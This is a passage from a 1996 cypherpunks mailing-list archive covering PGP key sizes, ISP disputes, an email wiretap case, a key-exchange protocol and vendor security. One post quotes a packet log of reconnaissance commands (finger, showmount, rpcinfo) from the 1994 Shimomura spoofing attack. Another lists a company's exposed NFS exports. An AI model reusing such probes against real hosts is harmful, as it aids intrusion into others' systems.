> > To download UDCM V2.0 for free, please go to:
> > http://members.aol.com/dataetrsch/udcm.html.
> > 
> > I hope you will consider applying UDCM in the software you develop.
Thank-you
> > very much for your time.
> > 
> > Sincerely,
> > 
> > Jeremy K.Yu-Ramos
> > President
> > DataET Research
> > Data Engineering Technologies
> > 
> 
> 
> 
> 	- Igor.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin Mahoney <kevin@emarc.com>
Date: Tue, 17 Mar 1998 22:01:00 -0800 (PST)
To: undisclosed-recipients:;
Subject: No Subject
Message-ID: <bulk.941.19960106121031@warlord.e-marc.com>
MIME-Version: 1.0
Content-Type: text/plain


Reply-to: kevinm@emarc.com
Subject: emarc Research Services

Hello,
I am contacting you on behalf of my company emarc, LLC.
(Electronic Media & Research Consultants) . We provide our
clients with services that utilize Internet technology,
sound sampling (compilation) methodologies and innovative
on-line implementation solutions . Our products and services
include:
 
Online Screening with guaranteed response rates based on completed
surveys.

On-going panel compilation for future studies or focus groups.

Panel compilation for buisness or consumer related studies. 

Online product affinity for software and computer related products.

Our services provide cost effective, efficient and accurate data collection
that can be generalized to larger populations through pre-screening and
post-hoc weighting. emarc's mission is to provide quality service to the
marketing, market research and political research communities.

For more information please call me at 1-561-347-0356 or drop me an email 
at kevinm@emarc.com

Regards
Kevin Mahoney
Director of Research Services
emarc, LLC. 
 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Mon, 1 Jan 96 08:40:22 PST
To: cypherpunks@toad.com
Subject: Re: Can We Cut the Crap?
In-Reply-To: <199601010637.AAA22761@dal1820.computek.net>
Message-ID: <uD61gD18w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Ed Carp [khijol SysAdmin]" <erc@dal1820.computek.net> writes:
> No one is forcing you to read anything I, or anyone else, says.  If you
> don't like it, the 'd' key is somewhere on your keyboard.  Or is that too
> much manual labor for you?  Grrr...

Ed, no one forced you (or anyone else) to read Fred Cohen while he was posting
to this mailing list.  I happen to be interested in his point of view. I may
or may not agree with it, but I want to know it and I'm grateful to Fred for
having taken his time to write.

There are people on this mailing list who appear to have very little technical
expertise (e.g., can't figure out how an anonymous remailer works), contribute
nothing but silly puerile flames to the discussion, and whose harassment has
caused Fred to stop contributing. They've deprived Fred of his right to spreak
and readers like me of our right to listen. This is censorship by bullying.

There exists, AFAIK, no procmail for the weird setup I have on this box. As soon
as I get something working, I'll start junking the flamers from my mail feed.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter Monta <pmonta@qualcomm.com>
Date: Tue, 2 Jan 96 17:40:48 PST
To: cypherpunks@toad.com
Subject: Re: Guerilla Internet Service Providers (fwd)
In-Reply-To: <m0tXAsV-00090IC@pacifier.com>
Message-ID: <199601030140.RAA03047@mage.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


> It seems to me that phone line costs are turning into a floor price for
> Internet access, when they shouldn't really be.  The main asset telephone
> companies have, right now, is in RIGHTS OF WAY.  Put an ISP in a business
> park that allows you to run  your own dedicated copper pairs, and you've
> bypassed $25/month/line business phone line charges. 
> 
> At some point, individual urban and suburban blocks could easily be
> "guerilla re-wired" for ISP access without serious trenching, etc.  The
> phoneco would still be involved, but in a far lower-profit mode, as the
> supplier of a single T1 to a multi-block area.  

For the "last mile" to the ISP user, wireless could be a better bet.
Have antenna, will surf.

(Not speaking for Qualcomm, etc.)

Peter Monta   pmonta@qualcomm.com
Qualcomm, Inc./Globalstar






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wink Junior <winkjr@teleport.com>
Date: Tue, 2 Jan 96 17:52:01 PST
To: cypherpunks@toad.com
Subject: Errata for _Applied Crypto_
Message-ID: <199601030151.RAA10025@kelly.teleport.com>
MIME-Version: 1.0
Content-Type: text


Bruce Schneier <schneier@counterpane.com> has an errata file for the second
edition of _Applied Cryptography_ available on request.  Hopefully he will
also make it available via the Web.  Hats off to Bruce for making this
information available in a timely, cost-effective manner.

Wink

--
"Dilute! Dilute! OK!"



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Tue, 2 Jan 96 17:26:55 PST
To: cypherpunks@toad.com
Subject: Re: Guerilla Internet Service Providers
In-Reply-To: <9601021325.AA15502@alpha>
Message-ID: <HRP4gD17w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


m5@dev.tivoli.com (Mike McNally) writes:
> Dimitri Vulis writes:
>  > > For how long  ... ?
>  >
>  > For as long as they're able to provide information and services that
>  > customers want, which are not available via "generic" small ISP's.
>
> But don't you think it likely that AOL & Compuserve will soon see the
> economic advantage of making their services available (for per-use
> fees) to the Internet as a whole?  If not AOL & Compuserve, then
> certainly the actual content providers themselves.  (The NSA may be a
> different matter.)
>
> I don't see why content providers would not be willing to make stuff
> available via the internet; they don't have to do it for free.

OK, I'm sure we have the nice folks from the National Computer Security
Association on this list.  Why don't they set up their forum so it's not
necessary to have a CompuServe account to access it?

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Tue, 2 Jan 96 17:46:13 PST
To: cypherpunks@toad.com
Subject: Re: Guerilla Internet Service Providers (fwd)
Message-ID: <199601030146.TAA02574@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: Jeff Simmons <jsimmons@goblin.punk.net>
> Subject: Re: Guerilla Internet Service Providers
> Date: Tue, 2 Jan 1996 16:32:33 -0800 (PST)
> 
> Punknet is a 'Guerilla ISP'.  Twenty of us share a 128k ISDN line, 
> distributed via high-speed modems.  It's been running fine for over
> a year now, but Pacific Bell has evidently decided to get rid of us.
> 
> How?  Simply by refusing to either repair or replace our 25 pair trunk
> line, which is rapidly degrading.  We've offered to replace it ourselves,
> but according to them, it's illegal.  Right now, we've got three dead lines,
> and two others that only will do 1200 baud.
> 

Hmmm, you should have some kind of Public Utility Commission (PUC) in your area
that regulates the service provider. Here in Texas if SWBT received more
than 2 complaints on a single problem without resolution then the customer
can request that the PUC force a resolution of the problem. It has the power
to fine SWBT on a per day basis until the problem is resolved. I have used
the process one time to a successful end. I had squirrels that kept eating
my phone lines when I first put in my ISDN and its dial-in lines. SWBT kept
comming out and repairing the lines and the squirrels kept eating them. I
asked for armored cables and was refused. I kept requesting them (and
keeping records). On the next to last time the tech came out I showed him
the records and advised him that I wanted armored lines. He said he would
advise his supervisor. A week later I had my armored lines (run specialy
nearly a block to the tie-block) and the problem was resolved until my
roomie burned the house down (the phone lines survived).

> We've been told that what they're doing is probably illegal, but it's the
> old problem:  Where does an 800 lb. gorilla sleep?
> 
> We're fighting this like all hell, but who knows?  After they get rid of us,
> I wonder who's next ...
> 

You also have the option of starting a civil and criminal claim dealing with
breach of contract. Phone companies must provide phone lines that meet
minimal standards (3kHz bandwidth / -32dB S/N). If the lines don't then the
phone company is responsible for getting the lines upgraded.

I rather doubt the phone company wants you out of business, they want your
money. It is probably a local supervisor who has a limited budget and staff
and is having to set priorities according to their supervisory
responsibilities. Get it taken up a level and you might find the climate
changes.

The FCC is enacting a new regulation that will cause every phone company to
provide 100% of their service areas with ISDN (you should have received some
kind of notice last week, I did). This also sets some minimum standards as
well as to the type and quality of service the phone company must provide.

Good luck.

            



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 3 Jan 96 19:45:24 PST
To: Rick Busdiecker <mianigand@unique.outlook.net>
Subject: Re: 2047 bit keys in PGP
Message-ID: <199601040341.TAA19633@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 19:52 1/3/96 -0500, Rick Busdiecker wrote:

>Another point to realize is that PGP uses a combination of ciphers.
>When encrypting, the RSA key is only used to encrypt an IDEA key.
>That IDEA key is used to encrypt your message.  Somewhere between 2048
>and 4096, you're making the RSA key stronger (harder to brute force)
>than the IDEA key.  At that point, the extra time that you're using
>for super-big RSA keys is totally wasted.

To nitpick:  Getting the RSA key will give you ALL the IDEA keys.  That is
probably worth 200-10000 times the effort.


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz@netcom.com             Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Maier David <maierd@bvsd.k12.co.us>
Date: Wed, 3 Jan 96 19:44:22 PST
To: wlkngowl@unix.asb.com (Mutatis Mutantdis)
Subject: Re: NOISE.SYS /dev/random driver for DOS, v0.3.3-Beta
In-Reply-To: <199601031215.HAA19436@UNiX.asb.com>
Message-ID: <199601040344.UAA18222@bvsd.k12.co.us>
MIME-Version: 1.0
Content-Type: text/plain


send noise033





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@csclub.uwaterloo.ca (Ian Goldberg)
Date: Thu, 4 Jan 96 08:30:45 PST
To: cypherpunks@toad.com
Subject: Re: 2047 bit keys in PGP
In-Reply-To: <v02130503ad119cbfdece@[205.231.67.43]>
Message-ID: <4cgva5$qe6@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


In article <v02130503ad119cbfdece@[205.231.67.43]>,
netdog <netdog@dog.net> wrote:
>nobody will ever need more than 640K or RAM?  i wouldn't underestimate the
>ability of technology to grow at a pace that is beyond our wildest
>dreams-especially with this network serving as a virtual office/lab.  of
>course, ymmv.

Order of magnitude check:

There is a very well-defined limit to the size of key that can be broken by
brute force, independent of your "wildest dreams" as to the growth of
technology.  It's the Laws of Thermodynamics.

For a symmetric algorithm for which any value of the appropriate length n
is a possibly valid (and equally likely) key, there are 2^n keys to try
in a brute-force search.  From Applied Crypto, 2nd ed, pp157-158,
setting or clearing one bit takes at _least_ 4.4*10^-16 erg of energy.
For symmetric keys of size 256, then, you would need more than 10^61 erg
(that's 10^45 GJ) of energy just to _enumerate_ the states.  For comparison,
this about 10 billion times larger than the output of a typical supernova.
(Ibid.)

From the same source:

"These numbers have nothing to do with the technology of the devices;
they are the maximums that thermodynamics will allow.  And they strongly
imply that brute-force attacks against 256-bit keys will be infeasible
until computers are built from something other than matter and occupy
something other than space."

Thus this situation is quite different from the 640K of RAM scenario.
It's more like "who would ever need more RAM than you could get by
storing a bit on every subatomic particle in the universe".  It's
not a matter of what resources you can imagine using, but rather,
what resources are in the universe, able to be used.

   - Ian "First post of the morning; it shows, doesn't it..."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Mon, 8 Jan 96 13:53:51 PST
To: jirib@cs.monash.edu.au
Subject: Re: A couple of ideas for PGP-based programs
Message-ID: <2.2.32.19960108215510.0095a6d4@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:26 PM 1/8/96 +1100, Jiri Baum wrote:

>> 2)  I would like to see a program like private Idaho have the ability to send
>> mail to the key server and grab all of the "unknown signator" keys.
>...
>
>This is very easy, at least in Unix: pgp -kvv, grep, cut, for.
>
>In DOS, you can do pgp -kvv and find, then edlin to change
>every "sig" into "call getkey", call the resulting (batch) file,
>which will call GETKEY.BAT for every missing key. I hope.

This is about what I do now.  I am writing a perl program that splits the
requests up into seperate mail messages and dumps them out to the mail
program dujour.

>However, I don't see much of a point to it: these are people you don't
>even know the keys of; how are you going to know whether they are
>trustworthy? (The Web-o-Trust can only tell you who they are, not
>whether to trust them.)

True, but I hate seeing keys with 40 signatures on it and all of them read
"Unknown Signator".  (I am expecting someone to use "Unknown Signator" or
"Key revoked" as a nym any day now.)

>...
>> This would
>> have the interesting effect of building a more complete keyring, while using 
>> the "web of trust" to weed out alot of the bogus keys that tend to crop up on
>> the key servers.  After n number of itenerations you would have more of the
>> "important keys" and the ones that have little or no signage would be left to
>...
>
>No, you wouldn't. You would tend to have the keys that sign a lot
>of other keys, which would include both SLED (Four-11) and a lot
>of careless people that sign every key in sight.

Very good point!  I was actually talking about the "incredibly bogus keys
that stopped living and take up valuable keyserver space".  Keys with names
like "Wow! This is neat! I think I will create 3-4 keys a day!!!!!".  (I
actually wound up retrieving a key like this.  They are pretty annoying...)

>How about, instead:
>
>3) A way to retrieve all the keys signed by a given entity.
>
>This would have the effect that when you come to trust Alice, you
>can simply go and get all the keys she signed. I believe the present
>keyservers don't allow that... (Or else I don't know how to ask for it.)

I like that idea alot!  That way you can retrieve keys signed by people you
trust.  (Would this be the "Web of Guilt by Association"?)  It might have a
downside or two...  (Privacy for key signers?  Job seekers denied a job
because they signed the key of a known member of the four horsemen? "Are you
or have you ever been a key signer for Tim May or one of his Tentacles?")

Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
              http://www.teleport.com/~alano/ 
"Governments are potholes on the Information Superhighway." - Not TCMay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael S. Fischer" <mfischer@nsi.edu>
Date: Mon, 8 Jan 96 14:22:47 PST
To: cypherpunks@toad.com
Subject: Re: WIRE TAP ON NET
In-Reply-To: <2.2.16.19960106040018.259fb770@terminus.storm.net>
Message-ID: <199601082222.OAA28936@equus.nsi.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 05 Jan 1996 23:00:18 -0500, "Douglas F. Elznic" <delznic@storm.net> said:

DFE> E-MAIL-TAP NETS CRIMINALS The first-ever court-approved wiretap
DFE> of an e-mail account has resulted in the arrest of three people
DFE> charged with running a sophisticated cellular-fraud ring.  The
DFE> alleged mastermind, a German electrical engineer, advertised his
DFE> illicit wares on CompuServe, where they caught the attention of
DFE> an engineer at AT&T's wireless unit.  The Secret Service and the
DFE> Drug Enforcement Agency then got into the act and obtained the
DFE> Justice Dept.'s permission to intercept e-mail messages between
DFE> the alleged perpetrator and his accomplices.  "This case
DFE> represents the challenges in the future if we can't get ahead of
DFE> the curve in technology," says a U.S. attorney, whose office is
DFE> prosecuting the case.  (Wall Street Journal 2 Jan 96 p16) --

Well, I can't exactly say I feel sorry for the guys, even if cellular
companies are ripping us off.  Anyone who commits crimes while using
email without encryption are idiots.

--Michael




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ng Pheng Siong <ngps@cbn.com.sg>
Date: Mon, 8 Jan 96 05:49:26 PST
To: John Young <jya@pipeline.com>
Subject: Re: Toad Hop
In-Reply-To: <199601072043.PAA14996@pipe4.nyc.pipeline.com>
Message-ID: <Pine.SOL.3.91.960108212644.29684A-100000@cbn.cbn.com.sg>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 7 Jan 1996, John Young wrote:
> Quoting some body:
>    On Christmas Day 1994 the attack begins.
> 
>    First, the intruder breaks into a California Internet site
>    that bears the cryptic name toad.com. Working from this
>    machine, the intruder issues seven commands to see who's
>    logged on to Shimomura's workstation, and if he's sharing
>    files with other machines.

From Shimomura's mail last January:

: The IP spoofing attack started at about 14:09:32 PST on 12/25/94.  The first
: probes were from toad.com (this info derived from packet logs):
: 
: 14:09:32 toad.com# finger -l @target
: 14:10:21 toad.com# finger -l @server
: 14:10:50 toad.com# finger -l root@server
: 14:11:07 toad.com# finger -l @x-terminal
: 14:11:38 toad.com# showmount -e x-terminal
: 14:11:49 toad.com# rpcinfo -p x-terminal
: 14:12:05 toad.com# finger -l root@x-terminal

>    Then the automatic spoofing attack begins. It will all be
>    over in sixteen seconds. The prediction packet attack
>    program fires off a flurry of packets to busy out the
>    trusted Internet server so it can't respond. Next, the
>    program sends twenty more packets to Shimomura's UNIX
>    workstation.

Again, quoting Shimomura's mail:

: About six minutes later, we see a flurry of TCP SYNs (initial connection
: requests) from 130.92.6.97 to port 513 (login) on server...
: 130.92.6.97 appears to be a random (forged) unused address (one that will 
: not generate any response to packets sent to it)...

Given that this was a _spoofing_ attack, mayhaps the packets from toad.com 
were also forgeries. Anyone in the know?


- PS
--
Ng Pheng Siong <ngps@pacific.net.sg>
NetCentre Pte Ltd * Singapore

Finger for PGP key.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard Charles Graves <llurch@networking.stanford.edu>
Date: Tue, 9 Jan 96 02:19:52 PST
To: cypherpunks@toad.com
Subject: Microsoft white paper on Access "security"
Message-ID: <199601091019.CAA27132@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Apparently the file name of the official position on Access security is
wx1051.exe. It should be on CompuServe and www/ftp.microsoft.com.

Among other wondrous things, Peter Miller writes in article
<4crdu2$gua@news-e1a.megaweb.com> in comp.databases.ms-access:

  BTW, there's a typo in the White Paper.  Where it says Access security
  relies upon 'RSA4 data encryption', they meant to say 'you not knowing
  the difference between a secure database application, and one that
  just contains a bunch of security dialogs that confuses the average
  user, but fails to protect either your code or your data'.

I bet someone's going to have a lot of fun with this one!!!

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 9 Jan 96 02:57:43 PST
To: cypherpunks@toad.com
Subject: Re: phone calls from hell
Message-ID: <2.2.32.19960109105852.00911118@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:48 AM 1/9/96 +0100, Anonymous wrote:
>Media reports said that the explosion was set off by
>remote control when Ayyash answered a call to him. It is
>not known how the identity of Ayyash was ascertained.

NBC News reported Monday that it was a Motorola phone, that Israel cut the
landlines to the house to encourage cellular use, that *the* call came from
the Engineer's *father*, and that an Israeli aircraft overhead triggered the
blast after assuring itself (by voice info) that the Engineer was using the
phone.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kephart@interserv.com
Date: Tue, 9 Jan 96 10:37:11 PST
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199601091836.AA25616@relay.interserv.com>
MIME-Version: 1.0
Content-Type: text/plain


please send anon remailer faq. many thanks.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kent Dahlgren <kent@trouble.WV.TEK.COM>
Date: Tue, 9 Jan 96 12:28:25 PST
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Re: Still [NOISE] but a.f.urban was clearly wrong [Fwd: Re: ABOI: Desperate User Support])
In-Reply-To: <199601091717.MAA31459@thor.cs.umass.edu>
Message-ID: <Pine.SUN.3.91.960109121653.1331A-100000@trouble>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 9 Jan 1996, Futplex wrote:

> trouble of doing an Alta Vista search for "trinidad" and "supermac". I think

Speaking of Altavista, check this data for the host www.dec.com:

Export list for www.digital.com:

/udir                    server2-fddi
/www_root/.i             server2-fddi enet-gw.pa.dec.com 
mts-gw.pa.dec.com decpa
.pa.dec.com
/www_root/.h             server2-fddi enet-gw.pa.dec.com 
mts-gw.pa.dec.com decpa
.pa.dec.com
/archive                 everyone
/archive/.4              everyone
/archive/.5              everyone
/archive/.6              everyone
/archive/.7              everyone
/archive/.a              everyone
/archive/.c              everyone
/archive/.d              everyone
/archive/.e              everyone
/archive/.j              everyone
/archive/.k              everyone
/archive/contrib         everyone
/archive/contrib/src     everyone

I told them about this via e-mail almost three weeks ago when I told them 
about being able to get different host's /etc/passwd file from a search.  
But I guess that's the way they want it.  This probably isn't the 
appropriate forum, but obviously they don't care.  Does anyone know a 
better way to tell them?  Maybe I'm just paranoid.  Its just that I kind 
of feel sorry for DEC; its not easy being burdened with the worst 
marketing staff in the world, having the world's fastest RISC processor, 
and having the media go wild over the P6.

Flames welcomed.....I'm homesick and need the abuse...:)

______________________________________________________________________________
______ T E K T R O N I X _ C P I D _ T E C H N I C A L _ S U P P O R T _______
                      /
 Voice: 1.800.835.6100             E-mail: support@colorprinters.tek.com
    Fax: 1.503.685.3063                WWW: www.tek.com
     BBS: 1.503.685.4504            E-World: Keyword Tektronix
      HAL: 1.503.682.7450                AOL: Keyword Tektronix
   Service: 1.800.835.6100                FTP: ftp.tek.com
______________________________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kent Dahlgren <kent@trouble.WV.TEK.COM>
Date: Tue, 9 Jan 96 12:30:01 PST
To: Bill Frantz <frantz@netcom.COM>
Subject: Re: Microsoft continues to mislead public about Windows security bugs (a bit long, with references)
In-Reply-To: <199601091809.KAA15511@netcom6.netcom.com>
Message-ID: <Pine.SUN.3.91.960109122737.1331C-100000@trouble>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 9 Jan 1996, Bill Frantz wrote:

> Security is a checkoff item, and if you can convince a retired major that
> the OS is secure, then he will approve it.  He is not going to check the
> details.  His expertise is in guard stations and chain link fences. 
> However, if someone, e.g. the trade press, rubs his nose in the fact that
> an OS's security can be breached, then he will take action.  He will
> pressure the publisher to release a fix that they say will fix the problem.
>  When they do, he will be happy.
> 
> Microsoft particulary, is oriented to selling product, not pride in 
> workmanship.

Wow.  Truth spoken.

______________________________________________________________________________
______ T E K T R O N I X _ C P I D _ T E C H N I C A L _ S U P P O R T _______
                      /
 Voice: 1.800.835.6100             E-mail: support@colorprinters.tek.com
    Fax: 1.503.685.3063                WWW: www.tek.com
     BBS: 1.503.685.4504            E-World: Keyword Tektronix
      HAL: 1.503.682.7450                AOL: Keyword Tektronix
   Service: 1.800.835.6100                FTP: ftp.tek.com
______________________________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "baldwin" <baldwin@RSA.COM (Robert W. Baldwin)>
Date: Tue, 9 Jan 96 13:55:05 PST
To: mark@unicorn.com
Subject: Can you break my encryption protocol ? - improvements
Message-ID: <9600098212.AA821224351@snail.rsa.com>
MIME-Version: 1.0
Content-Type: text/plain


Mark,
        The protocol works well as long as you trust the ability of
clients to generate random numbers and you are not too worried about 
replay or message modification attacks.  If you are, then the session 
key should be a function of random values chosen by both the client 
and the server.  That way, a replay of the initial connection message 
will not cause the server to use the same key.  
        You may also want to add key verification in case the application
does not already provide a simple way to tell if both parties are using 
the same key.  For example, the client and server could exchange known 
values encrypted under the session key before continuing.
        Here's a protocol based on the ISO standards that has both
dual key determination (both parties influence the key value and neither 
can control the range of possible keys in any useful way), and dual
key validation (both parties end up knowing they are talking to someone 
who can compute the common key).

Client computes:
  Mc = unpredictable 128 bit value.  Serves as authenticator and
       as a value that is unknown to the attacker.
  Nc = H(Mc)  // Hash of Mc like MD5(Mc)

C->S: C, S, Nc
    The names or IP addresses of C & S are included to avoid various
replay and reflection attacks.  Message integrity is done later.

Server computes:
  Ms = unpredictable 128 bit value.
  Ns = H(Ms)
  P = shared passphrase padded with zeros to multiple of 64 bytes
      which is the block size of the hash function's compress operation.
  K = H(P || H(P || C || Nc || S || Ns)) 
  Vs = Enc(K, Ms)
       The value Ms is unknown to the attacker, so this value does not
       help with mounting a brute force key search.

S->C: S, C, Ns, Vs

Client computes:
  P = shared passphrase padded with zeros to multiple of 64 bytes
      which is the block size of the hash function's compress operation.
  K = H(P || H(P || C || Nc || S || Ns)) 
  X = Dec(K, Vs)
  Test that H(X) = Ns, if not return error and close connection. 
  Vc = Enc(K, Mc)

C->S: C, S, Vc

Server computes:
  X = Dec(K, Vs)
  Test that H(X) = Ns, if not return error and close connection.
  
All subsequent communication should be encrypted with K.

                --Bob Baldwin



______________________________ Forward Header __________________________________
Subject: Can you break my encryption protocol ?
Author:  ,"Mark Grant, M.A. (Oxon)" <mark@unicorn.com> at INTERNET 
Date:    1/9/96 8:10 AM

I'm trying to put together a simple protocol for encrypting confidential 
but typically low-value data (i.e. I don't want people to be able to read 
it, but in most cases it wouldn't be catastrophic if they could). I want 
it to be completely license-free, so I can't use RSA or other patented 
algorithms. It also would only be used inside one organisation, so key 
management isn't so much of a problem, and the main attack it has to 
defend against is packet-sniffing on the Net. It also has to support 
variable-length keys for ITAR.. 

The idea is as follows..


Client and server both have copies of a passphrase, of any length.

When starting the connection, client sends 128 random bits to the server.

Both ends take this data, append the passphrase, and use MD5 to generate 
a session key. If a key of less than 128 bits is required for legal 
reasons, then the appropriate number of bits are retained, and the rest 
replaced with bits from the random data that was sent in the clear.

That is, if you're only allowed 40 bit security, you take the first 88 
bits that you were sent, and append the last 40 bits of the generated key 
to give you the session key to use.

You then go off and encrypt the session (probably using 3DES or Blowfish). 


Can anyone spot any flaws in this system ? The only potential problem I 
can see would be that by cracking a number of sessions you could work out 
the passphrase. However, I think the number required would still be 
infeasible. 

Also, are there any known problems with using Blowfish for encrypting a 
data stream ? I'm assuming it's OK as it's used in PGPfone. 

 Mark






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frankw@in.net (Frank Willoughby)
Date: Tue, 9 Jan 96 11:23:31 PST
To: cypherpunks@toad.com
Subject: Re: Microsoft continues to mislead public about Windows security
Message-ID: <9601091923.AA01238@su1.in.net>
MIME-Version: 1.0
Content-Type: text/plain


From the desk of Lucky Green:

>
>Very true. But why does it always seem to take an exploitable crack before
>companies pay attention to security flaws? Is it because they are unable to
>admit that they have made a mistake? Everybody makes mistakes. What's the
>big deal? I really don't understand it. Any psychologists on this list?

I'm not a psychologist, but I have worked in the Information Security field
for a while now.

When a system is breached or a CERT Advisory is issued, this is a major
embarassment for the company.  The breach (or publicized security flaw)
shakes the confidence of people in the vendor's products.  People are 
rather unwilling to risk putting their business-critical data on a system 
which has just recently breached.  This lack of confidence translates into
a loss in sales.  If unchecked or the case if severe enough, this could 
also translate into a loss of jobs.

If the consumers (or some key major players) put pressure on the vendors 
to secure their systems, then it will happen.  Until then, the vendors
will continue provide us in the Information Security field with unparalleled 
job security.  8^)  You would be surprised how bad the situation really
is and how many companies are vulnerable and to what extent (then again, 
you may not).

We now return you to your discussion on crypto.  8^)

Best Regards,


Frank
Fortified Networks Inc. - Management & Information Security Consulting
Phone: (317) 573-0800   - http://www.fortified.com/fortified/

<standard disclaimer>
The opinions expressed above are of the author and may not 
necessarily be representative of Fortified Networks Inc.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gordon Campbell <campbelg@limestone.kosone.com>
Date: Tue, 9 Jan 96 12:30:25 PST
To: shamrock@netcom.com (Lucky Green)
Subject: Re: Microsoft continues to mislead public about Windows  security bugs (a bit long, with references)
Message-ID: <2.2.32.19960109200303.0068fed4@limestone.kosone.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:37 AM 1/9/96 -0800, you wrote:

>Very true. But why does it always seem to take an exploitable crack before
>companies pay attention to security flaws? Is it because they are unable to
>admit that they have made a mistake? Everybody makes mistakes. What's the
>big deal? I really don't understand it. Any psychologists on this list?

I'm not a psychologist, but I'd guess that by the time a crack is released,
knowledge of a problem is so widespread, that the company responsible can't
ignore it. Kind of an ostrich thing.

-----
Gordon R. Campbell, Owner - Mowat Woods Graphics
P.O. Box 1902, Kingston, Ontario, Canada  K7L 5J7
Ph: (613) 542-4087   Fax: (613) 542-1139
2048-bit PGP key available on request.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Wed, 10 Jan 96 08:56:34 PST
To: tcmay@got.net
Subject: Re: Don't type: "g**d t*m*s v*r*s"
In-Reply-To: <ad180444000210042513@[205.199.118.202]>
Message-ID: <xty8w8m9LQbJ085yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <ad180444000210042513@[205.199.118.202]>,
tcmay@got.net (Timothy C. May) wrote:

> (More seriously, I notice that "alt.folklore.suburban@c2.org" was in the
> distribution list for the message I'm replying to (pared out by me on this
> message). I really hope that this does not mean what I think it means, that
> "alt.folklore.suburban" is not being copied! The cross-contamination of
> many mailing lists is one thing, but cross-contaminating our mailing list
> and Usenet groups would truly be the work of the Army of the Twelve
> Monkeys.)

Fear not.  alt.folklore.suburban is a moderated newsgroup; if c2.org injects
the message into the newsfeed without an Approved: header, it isn't going
anywhere.

- -- 
   Alan Bostick             | He played the king as if afraid someone else 
Seeking opportunity to      | would play the ace.
develop multimedia content. |      John Mason Brown, drama critic
Finger abostick@netcom.com for more info and PGP public key

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMPMr8eVevBgtmhnpAQEs2AMAqLm3/ctZbG3AP5fSIA6d6H8tji6/rKZa
usm4NLgn3K0gGQvz8WV+lUyl65vRsD+7xSCQkkqJZhcRnuhgRfyAkmONTFZliuQ8
pqzQATB2SY7sA29vEosEv+HN4T14RX9I
=jqpY
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@accessone.com>
Date: Tue, 9 Jan 96 20:40:38 PST
To: "cypherpunks@toad.com>
Subject: RE: S.652 (H.R. 1555) ("obscene, lewd, lascivious, filthy, or indecent...et al")
Message-ID: <01BADED3.DE4C0660@blancw.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


You know, you all are worrying too much about this War of the Offending Words.   What the governing types are really trying to prevent is communication which is succinct, direct, penetrating, & to the point.

What needs to do is to learn to speak like politicians.  Learn to go around the subject, make indirect reference, make vague allusions, be indirect & wavering, ambiguous & obfuscating, evasive & hypocritical; never openly offending, never possible to be held liable for having said anything of consequence.

Of course it will still be annoying, but how can they criticize their own style & manner.

    ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
